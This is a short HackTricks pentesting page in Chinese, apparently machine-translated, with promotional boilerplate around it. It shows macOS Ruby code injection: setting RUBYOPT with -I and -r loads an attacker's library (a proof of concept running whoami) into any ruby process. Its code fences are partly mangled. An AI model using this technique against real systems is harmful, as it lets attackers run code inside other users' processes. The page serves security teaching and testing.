macOS Ruby Applications Injection

从零开始学习 AWS 黑客攻击直到成为专家，通过 htARTE (HackTricks AWS 红队专家)！

其他支持 HackTricks 的方式：

如果你想在 HackTricks 中看到你的公司广告或下载 HackTricks 的 PDF，请查看订阅计划！
获取 官方 PEASS & HackTricks 商品
发现 PEASS 家族，我们独家的 NFTs 集合
加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 上关注我 @carlospolopm。
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享你的黑客技巧。

RUBYOPT

使用这个环境变量可以在每次执行 ruby 时添加新的参数。虽然不能使用参数 -e 来指定要执行的 ruby 代码，但可以使用参数 -I 和 -r 来添加一个新的文件夹到库加载路径，然后指定一个要加载的库。

在 /tmp 中创建库 inject.rb：

inject.rb

puts `whoami`

创建一个 Ruby 脚本，例如：

hello.rb

puts "Hello, world!"

```ruby puts 'Hello, World!' ``` ```markdown 然后使用以下命令加载一个任意的ruby脚本： ``` ```bash RUBYOPT="-I/tmp -rinject" ruby hello.rb ``` 趣事，即使使用参数 **`--disable-rubyopt`** 也能工作： ```bash RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt ```

从零到英雄学习AWS黑客攻击 htARTE (HackTricks AWS红队专家)！

支持HackTricks的其他方式：

如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF，请查看订阅计划！
获取官方PEASS & HackTricks商品
发现PEASS家族，我们独家的NFTs系列
加入 💬 Discord群组 或 telegram群组 或在Twitter 🐦 上关注我 @carlospolopm。
通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

上一页macOS Python Applications Injection 下一页macOS .Net Applications Injection

最后更新于1年前

hashtagRUBYOPT

RUBYOPT